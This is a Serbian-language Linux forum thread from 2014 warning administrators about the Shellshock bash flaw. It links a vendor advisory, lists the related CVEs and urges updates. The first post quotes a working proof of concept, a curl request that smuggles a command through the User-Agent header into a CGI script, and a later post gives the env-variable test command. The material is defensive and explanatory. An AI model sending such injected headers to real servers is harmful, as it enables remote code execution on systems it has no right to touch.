Shellsock - bash remote code execution

Shellsock - bash remote code execution

offline
  • Pridružio: 26 Avg 2005
  • Poruke: 384
  • Gde živiš: Beograd

Samo malo obavestenje za sve Linux admine juce je otkriveno da su sve verzije bash-a ranjive. Update jako preporucljiv.
Vise info-a
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
random primer sa neta:


[root@host cgi-bin]# rm -fr /tmp/aa
[root@host cgi-bin]# cat /var/www/cgi-bin/hi
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "hai"
[root@host cgi-bin]# curl -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa'  https://localhost/cgi-bin/hi
hai
[root@host cgi-bin]#  tail -n1 /var/log/httpd/ssl_access_log
::1 - - [24/Sep/2014:18:22:05 +0200] "GET /cgi-bin/hi HTTP/1.1" 200 4 "-" "() { :;}; echo aa>/tmp/aa"
[root@host cgi-bin]#  ls -l /tmp/aa
-rw-r--r--. 1 apache apache 3 24 sept. 18:22 /tmp/aa



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
offline
  • Pridružio: 17 Jan 2014
  • Poruke: 546

Napisano: 26 Sep 2014 14:20

pogodjeni su i osx i uniix systemi sa ovim
kod ubuntu-a (svih verzija) fix ce biti implementiran putem redovnog update-a
inace, ova "rupa" je prisutna vec duzi niz godina ali opet je tesko koristiti dati propust jer korisnik sam mora da napravi fajl u /var folderu

Dopuna: 28 Sep 2014 8:55

test komanda za proveru je:
 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
postoje 4 ranjivost koje su javne i jedna koja se tek utvrdjuje.
CVE-2014-6271
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187

CVE-2014-6277

detaljniji test vrsi skripta:
script by hannob

ne bi bilo lose da OP promeni naziv teme u #shellsock ili #bashbug



offline
  • bocke  Male
  • Moderator foruma
  • Glavni moderator Linux foruma
  • Veliki Pingvin
  • Guru
  • Pridružio: 16 Dec 2005
  • Poruke: 12110
  • Gde živiš: Južni pol

Pošto imamo forum koji se malo ozbiljnije bavi propustima, premeštam temu tamo.

Ko je trenutno na forumu
 

Ukupno su 701 korisnika na forumu :: 63 registrovanih, 5 sakrivenih i 633 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 1567 - dana 15 Jul 2016 19:18

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: ante mpt, blackjack, Bosko Buha2, Bov80, branko72, celeron, Danko SVIK VRS, darkangel, DJ GlavomITacticalBeardom, Dostanic09, Drug pukovnik, Dzoni Stek, FOX2, Futurama, Georgius, goranvas, GreenMan, Gvozdena reč, ikan, inskk, Irbis, Jadranko1969, JOntra2, Kaplar, kvcali, ljuba sd, Lucije Kvint, Luka Vujcic, Mercury, Metanoja, Mikulino, Milan Karan, Milan Kosić, milimoj, miodrag3, Miroslav.Cvejic, mushroom, nenad812, ninareflex, NiZdr, Oscar2, pein, plavii, rapha, Ray1973, renoje2, rovac, SAA fan, shaja1, ShurikSST, Snorks, sottovoce, srbi, stalker, StefanNBG90, stringer bell, styg, vladetije, Yellow Pinky, yrraf, Zandar, Zerajic, zlaya011